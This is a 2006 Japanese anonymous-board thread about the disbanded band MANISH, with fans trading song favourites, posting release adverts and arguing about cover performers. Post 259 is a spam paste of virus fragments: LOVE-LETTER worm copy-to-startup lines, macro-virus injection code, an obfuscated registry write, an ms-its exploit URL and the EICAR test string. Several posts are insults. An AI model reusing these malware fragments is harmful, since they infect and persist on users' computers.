動画みました。 久々にMANISHみれて感激です。
ありがとう〜
またお願いします。

210 :伝説の名無しさん:2006/05/30(火) 01:59:02

-------------------------- 緊急速報!! --------------------------

愛内里菜 渾身の★5thアルバム『DELIGHT』5月31日発売!!

  「PLAYGIRL」から1年半ぶりとなるニューアルバムはキラ☆度120%!!
  弾けるダンス・ポップから真骨頂の哀愁系ダンスチューンまで、全14曲収録!!
  発売日:5月31日  品番:GZCA-5079  価格:3,059yen(tax in) / 2,913yen(tax out)

5th ALBUM『DELIGHT』
5月31日発売!!
収録曲
01.DELIGHT
02.GLORIOUS
03.PRECIOUS PLACE
04.Believe your Bravery
05.LOVE OR BE LOVED
06.赤く熱い鼓動
07.MIRACLE
08.REASON
09.しるし
10.WESUMMER
11.モーニングエール
12.ORANGE★NIGHT -La La La Lovin' you Mix-
13.SET YOU FREE
14.I'll be delighted

元ビーイングのMANISHファンの皆さんならこのアルバムのよさが分かるはずです!!
ぜひ手にとって愛内里菜のその世界観を体感してください!!



211 :伝説の名無しさん:2006/05/30(火) 17:58:08
愛内里菜は2ndあたりまでは良く聞いてたかな
最近また聴きだしたけど、アルバム聴いてみようかなぁ

しかし、愛内里菜は売れる要素は有ると思うんだけど
ブレイクとまではいつも行かないねぇ...
バーンと売れて消えていくよりかは今の状態の方が長生きできていいかもしれないね

212 :伝説の名無しさん:2006/05/31(水) 20:57:34
愛内って歌上手いだけじゃん?魅力が。
ルックスは微妙だし歌詞もあんまり良くないし
曲も最近良くないから売上落ちて当たり前な気がする
アルバムはレンタルしようかな

213 :伝説の名無しさん:2006/06/01(木) 20:40:35
同意

214 :伝説の名無しさん:2006/06/03(土) 00:21:08
ロマン作戦GO&GOうpしてください

215 :伝説の名無しさん:2006/06/03(土) 21:14:06
駄目!!!!!!!!!!ぜーったいに
駄目!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

216 :伝説の名無しさん:2006/06/03(土) 22:44:18
恋人と呼べない〜だけ廃盤なんだよな。
全アルバムにも結局オリジナルの恋人と呼べない〜は収録されなかったねぇ。
受注生産してくれないのかな、ビーイングは・・・。

217 :伝説の名無しさん:2006/06/04(日) 18:10:29
>>214
氏ね

218 :伝説の名無しさん:2006/06/04(日) 21:38:27
>>217
うるせータコ

219 :伝説の名無しさん:2006/06/05(月) 21:49:34
サラ仕上げ

220 :伝説の名無しさん:2006/06/06(火) 02:04:32

本日フライングゲット日のため

---------------------------------- 超緊急速報!! ----------------------------------

もはや、説明不要! 日本最高峰のロックユニットB'zの新曲「SPLASH!」6/7発売決定!

日本屈指のハイトーンヴォーカリスト稲葉浩志の心に響く卓越したリリックに
天才コンポーザー松本孝弘(TAK MATSUMOTO)のメロディーが重なる夏らしいはじける
ノリノリのサマー・ロック・チューンになっています!!

そして!何と初回限定盤には2005年のライブ「CIRCLE OF ROCK」映像から厳選された
迫力のライブ映像 「愛のバクダン」・「パルス」・「Fever」それぞれを収録した特典DVD付!
発売日:2006年6月7日 価格、初回限定盤(3種類)の内容は以下の通り

【曲名】
1st beat:SPLASH!
2nd beat:MVP

【初回限定版】1,575yen(tax in)
1. グリーン/ CD+特典DVD「愛のバクダン」
2. ブルー/ CD+特典DVD「パルス」
3. イエロー/ CD+特典DVD「Fever」

【通常版】1,050yen(tax in)
レッド/CDのみ(特典映像はつきません)

元ビーイングギザグループのMANISHファンの皆さんなら、この最高峰のロックサウンドの
よさが分かるはずです!! ぜひ手にとってB'zのその世界観を体感してください!!
そしてよろしければバージョン違いを1枚ずつ最低4枚買っていただけると幸いです!!



221 :伝説の名無しさん:2006/06/06(火) 16:52:35
B'z4枚買ってきたよ
恋心っぽくて良いね

222 :伝説の名無しさん:2006/06/06(火) 19:07:43
>>220
毎度毎度乙
ただ、「元」ビーイングギザグループのMANISHって...元は余計です!

223 :伝説の名無しさん:2006/06/07(水) 19:19:26
だけどそれじゃ苦しくて
毎日逢いたくて

224 :伝説の名無しさん:2006/06/11(日) 13:00:49
宇多田?

225 :伝説の名無しさん:2006/06/14(水) 07:12:38
age

226 :伝説の名無しさん:2006/06/15(木) 23:47:30
明日なんて誰にも解らないから

227 :伝説の名無しさん:2006/06/16(金) 12:03:24
ふと君のこと思った瞬間鳴りだした電話から流れた優しい声

228 :伝説の名無しさん:2006/06/16(金) 12:06:02
ワールドカップのテーマソングに、明日のStoryを使ってほしい!JリーグA GOGOテーマソングだったし(笑)

229 :伝説の名無しさん:2006/06/17(土) 00:24:04
あげあげ

230 :伝説の名無しさん:2006/06/17(土) 01:49:48
>>228
スポンサーに頼んでみたら( ´,_ゝ`)プッ、ダセーって笑われたよ

231 :伝説の名無しさん:2006/06/17(土) 10:41:03
ふーん

232 :伝説の名無しさん:2006/06/18(日) 09:18:33
明日のStoryより
いつか誰かに出逢うため、走り出せLonely Nightの方が良曲

233 :伝説の名無しさん:2006/06/18(日) 13:46:18
ロマン作戦Go!andGo!の方がネ申

234 :伝説の名無しさん:2006/06/18(日) 14:17:26
君の空になりたいが良いな。
ちっちゃいライブハウスとかでもいいから復活しないかなぁ

235 :伝説の名無しさん:2006/06/19(月) 23:49:14
FEEL SO BADが復活するんだからMANISHもおながいします!
まぁ、川島だりあはBeingに貢献してるから出来たんだろうなぁ...

236 :伝説の名無しさん:2006/06/22(木) 19:50:34
君の空になりたいは活動中は好きになれなかったけど、今は大好き。

237 :伝説の名無しさん:2006/06/24(土) 03:24:27
君の空になりたいは俺の中では不動の1位

238 :伝説の名無しさん:2006/06/25(日) 23:37:47
ほろ苦い思い出も かなりあるよね

239 :伝説の名無しさん:2006/06/27(火) 15:11:37
どんなに肩肘張って生きても 誰も皆 誰かを求めてる

↑このフレーズ好き。気楽になれる

240 :伝説の名無しさん:2006/06/28(水) 01:11:32
ときめきを捕まえて 向風に逆らってもいい

241 :伝説の名無しさん:2006/06/28(水) 14:23:38
あのアウトロは神だね
イントロは いつか誰かに〜が一番好きだけど

242 :伝説の名無しさん:2006/06/28(水) 14:28:15
彼のサイン色紙、生写真は今日処分した

243 :伝説の名無しさん:2006/06/28(水) 20:27:26
君の空に〜のアウトロは希望を感じさせる

244 :伝説の名無しさん:2006/06/29(木) 00:39:22
>>243
わかる…あの1分間は何とも言えないよね

245 :伝説の名無しさん:2006/06/29(木) 03:14:52
君の空になりたいはちょっとだけ歌いにくい

246 :伝説の名無しさん:2006/06/30(金) 23:48:21
君の空になりたいっていうタイトルもいいよね。

247 :伝説の名無しさん:2006/07/01(土) 10:39:14
同意

248 :伝説の名無しさん:2006/07/02(日) 02:48:48
cheer!は全曲良いよな

249 :伝説の名無しさん:2006/07/02(日) 09:33:04
マニッシュはギターサウンドが意外と合うよね

250 : ◆.MUWXd2/FI :2006/07/02(日) 22:19:57
しねじ250

251 :伝説の名無しさん:2006/07/03(月) 18:53:26
しめじ阻止?
しねじ。

252 :伝説の名無しさん:2006/07/05(水) 00:46:38
最近全くしめじを見ない件w

253 :伝説の名無しさん:2006/07/07(金) 11:45:53
しねじw

254 :伝説の名無しさん:2006/07/07(金) 16:10:04
Mステかな
ttp://www.youtube.com/watch?v=5CQ8ztglYdA

255 :伝説の名無しさん:2006/07/08(土) 23:58:37
時々音を外すけど、いい声だよね。もったいないな。

256 :伝説の名無しさん:2006/07/10(月) 11:42:55
530 :名無しのエリー:2006/07/10(月) 10:02:39 ID:95r06Hm9
STARDUSTが西本麻里と作家契約をしたみたいだね。
音楽部門、特にアイドル路線狙うみたいだからBeingもやばいかも。
沢尻エリカのデビュー曲は西本麻里作曲、さらに作詞は柴咲コウ。
Beingの手法をSTARDUSTの政治力で実践すると…


257 :伝説の名無しさん:2006/07/10(月) 12:07:27
>>256のソースはどこなんだろうね

258 :伝説の名無しさん:2006/07/13(木) 18:58:49
どうせガセでしょ

259 :伝説の名無しさん:2006/07/13(木) 22:58:28
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

260 :伝説の名無しさん:2006/07/14(金) 06:38:10
ウイルスコードを貼っている件を報告しておくよ

261 :伝説の名無しさん:2006/07/14(金) 09:09:26
music freak magazine サポーターズコンベンションVol.2
『COUNTDOWN BEING PARTY』開催決定!

(略)
そして第2回目となる今回は、通販事業部で販売し好評を頂いてるコンビレーション・アルバム
『COUNTDOWN BEING』と連動し、収録曲のカヴァー・ライブ、題して、『COUNTDOWN BEING
PARTY』を開催する事となりました。
B'z、ZARD、WANDS、T-BOLAN、Mi-Ke、大黒摩季などの、90年代を代表する名曲のカヴァー
・ライブ。(当日の詳しい演奏曲はまだ未定)
是非多くの方のご参加をお待ちしてます!

■タイトル:music freak magazineサポーターズコンベンションvol.2『COUNTDOWN BEING PARTY』
■日時:06年9月9日(土) 開場:17:30/開演:18:00
■場所:大阪hillsパン工場cafe B2 (大阪市北区西堀江1-3-17)
■料金:3,500円(1drink付)
■出演アーティスト:三枝夕夏 IN db、北原愛子、竹井詩織里、荒神直規


262 :伝説の名無しさん:2006/07/14(金) 12:07:05
最悪!↑こいつらにカバーされたくねぇよな
MANISH歌われた日には…大黒麻季の曲だってこのメンバーじゃ歌いこなせないと思うが

263 :伝説の名無しさん:2006/07/14(金) 12:08:20
すまぬ摩季姉…

264 :伝説の名無しさん:2006/07/14(金) 12:16:43
何故ベストを尽くさない

カバーライブなど誰も望んじゃいない

265 :伝説の名無しさん:2006/07/14(金) 20:50:53
ZYYGだって一日限りの復活ライブやったのにな

カバーなんかさせないで本人つれてこいや

266 :伝説の名無しさん:2006/07/14(金) 21:28:28
マニッシュを歌ってほしいのは
愛内・滴草・上木・大野ぐらい…

三枝夕夏とかはマジ勘弁ね

267 :伝説の名無しさん:2006/07/14(金) 21:33:06
ほんと三枝は勘弁

268 :伝説の名無しさん:2006/07/15(土) 02:56:11
>>266-267
自演乙
GIZA系には誰一人として歌ってもらいたくない

269 :伝説の名無しさん:2006/07/15(土) 12:35:22
>>268
なんで自演って決めつけるんだよw

滴草と愛内と上木は上手いから俺は別に良い
北原や三枝は勘弁だが

270 :伝説の名無しさん:2006/07/15(土) 12:55:26
それは君がGIZA娘→マニッシュで来てるから
逆だったら歌が上手かろうが全員勘弁が多数だと思われ GIZAだけは絶対勘弁
それはB'z,WANDS,ZARD,T-BOLAN等でも同じ

271 :伝説の名無しさん:2006/07/15(土) 16:21:23
↑同意・・・。もんすごく同意・・・。

272 :伝説の名無しさん:2006/07/15(土) 19:11:40
ライブで1日だけカバーするだけなのに
なんでここまで必死 ????

273 :伝説の名無しさん:2006/07/15(土) 19:19:00
必死なのはgiza擁護してる肝の方だろ
いい加減はよ巣に帰れや

274 :伝説の名無しさん:2006/07/15(土) 22:48:58
必死になるのはMANISH愛あればこそ(笑)
本人所在不明でカバーなんていやや〜
ま、当日MANISHがカバーされる可能性もゼロに近いような

275 :伝説の名無しさん:2006/07/15(土) 23:21:18
カバ-されたくないけど... な〜んで? ゼロ? おしえて〜!

もしかして長戸に嫌われてる?

276 :伝説の名無しさん:2006/07/16(日) 03:13:55
ヒント:地名度

277 :伝説の名無しさん:2006/07/16(日) 07:42:14
煌めく〜ならありえるかもよ

278 :伝説の名無しさん:2006/07/16(日) 10:23:42
うーん
それはありうるか…
(-_-;)嫌かも

279 :伝説の名無しさん:2006/07/16(日) 12:34:28
俺は映像化されないだろうしどうでもいいかな

280 :伝説の名無しさん:2006/07/16(日) 14:01:44
夕夏タソ ハァハァ

281 :伝説の名無しさん:2006/07/16(日) 15:56:18
Mステに出た中でいつもナチュラルメイクな美鈴さんが驚くほどケバい時があった
髪もウェーブで
服装はかわらずだったけど〜

282 :伝説の名無しさん:2006/07/16(日) 22:47:28
>>281
君の空になりたいで出た時かな?

283 :伝説の名無しさん:2006/07/16(日) 22:58:32
この人たち今でも活動してるの?

284 :伝説の名無しさん:2006/07/16(日) 23:38:25
>>282 そうだったかもしれん。

285 :伝説の名無しさん:2006/07/16(日) 23:56:46
>>284
あれには驚いた…ケバかったな確かに

286 :伝説の名無しさん:2006/07/17(月) 12:04:48
いまいち愛想の良い印象が無いな。
どっちかって言うとクールな感じがする。
雰囲気的にB'zに共通する点がある。
まあ女版B'zって言えばKIX・Sの方が近いけど。

287 :伝説の名無しさん:2006/07/17(月) 15:49:46
>>283 してませんよ。

288 :伝説の名無しさん:2006/07/17(月) 15:54:53
高橋美鈴って生歌ちょっと微妙だよね

289 :伝説の名無しさん:2006/07/19(水) 08:29:21
三枝がManishをカバーしたら・・・
とんでもないことになるな

290 :伝説の名無しさん:2006/07/19(水) 19:43:43
やめよーぜ
想像さえしたくない

291 :伝説の名無しさん:2006/07/20(木) 10:13:43
三枝夕夏が前テレビに出て歌ってるのを見たんだけど・・・Being史上最低レベルだと思うな。歌下手でも声質さえ良ければどうにかなるけど三枝は声質も最悪だと思う・・・
なんか気持ち悪い声・・・
あの声で♪もう誰の目も〜 なんて歌われたら・・・って感じ。
北原愛子もかなり下手だし。三枝よりはましだけど・・・

292 :伝説の名無しさん:2006/07/20(木) 13:15:51
ひらめくときに囚われて

293 :伝説の名無しさん:2006/07/20(木) 18:42:12
>>291
GIZAのことなどどーでもいい
おまえ数日前からずっと居るけどはやく巣に帰れ

294 :伝説の名無しさん:2006/07/20(木) 22:04:16
ま、いいじゃない
MANISH好きな人なら話そうよ!

295 :伝説の名無しさん:2006/07/22(土) 11:22:40
mixiミュージック 7/22付 ランキング

1.煌めく瞬間に捕われて   168
2.煌めく瞬間に捕らわれて   97
3.声にならないほどに愛しい   29
4.煌めく瞬間に捕われて〜CINE VERSION〜   28
5.煌く瞬間に捕われて   24
6.この一瞬という永遠の中で   20
7.眠らない街に流されて   18
8.走り出せLonely Night   15
8.もう誰の目も気にしない   15
9.素顔のまま KISSしよう   13

※mixi(ミクシィ)とは日本の情報通信関連企業株式会社ミクシィ(mixi, Inc.)、および同社が運営する、日本国内で最大のユーザー数を持つ、完全招待制の閉鎖的で
馴れ合い好きなアホどもが集合した馬鹿集団のソーシャル・ネットワーキング・サービスの一つ。2004年2月オープン。2006年5月15日には、利用者数が400万人を突破した。
サービス名である「mixi」は、「mix (交流する) 」と「i (人) 」とが由来。本来は18歳未満は利用できない、一応成人向けサイトである。
mixiミュージックとは、PCで聞いている音楽を自動的にリスト化して自分だけのランキングを作成するもの。
マイミクシィの音楽リストを見ることもできるので、新しい発見や、思わぬ共通点でさらに交流が深まることもある。

またアーティストページでは、mixi内でのアーティスト内ランキングを見ることができ、自分の好きなアーティストの楽曲で、
何が一番聴かれているのか? 自分のお気に入りは何番目? といったこともひと目でわかるという
実にくだらない馬鹿馬鹿しいシステムである。

296 :伝説の名無しさん:2006/07/22(土) 12:23:28
君の空になりたい
最高23位
売上枚数;34,150

297 :伝説の名無しさん:2006/07/23(日) 06:54:09


298 :伝説の名無しさん:2006/07/24(月) 06:29:42
角の古着屋へふと入ってみる♪

299 :伝説の名無しさん:2006/07/24(月) 14:06:43
スラダンのアルバムに煌めく〜のCinema Versionが入ってるみたいなんだけど
聴いた人いる?

300 : ◆wrMqd62B/E :2006/07/24(月) 19:43:11
しめじ300

301 :伝説の名無しさん:2006/07/25(火) 11:53:48
ア然

302 :伝説の名無しさん:2006/07/25(火) 14:42:08
愛は生きてる

303 :伝説の名無しさん:2006/07/26(水) 07:56:06
高橋美鈴って今
畠山鈴香みたいになってそうwwwwwwww



304 :伝説の名無しさん:2006/07/26(水) 12:34:01
>>303
それって三枝夕夏に似てるやつ?w

305 :伝説の名無しさん:2006/07/27(木) 12:20:23
>>303は基地害









306 :伝説の名無しさん:2006/07/28(金) 11:40:50
>>303
死ね

307 :伝説の名無しさん:2006/07/28(金) 14:07:46
>>304
死ね

308 :伝説の名無しさん:2006/07/28(金) 14:37:42
いや、でも冗談じゃなく
高橋美鈴って今
畠山鈴香みたいになってそうwwwwwwww

50 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)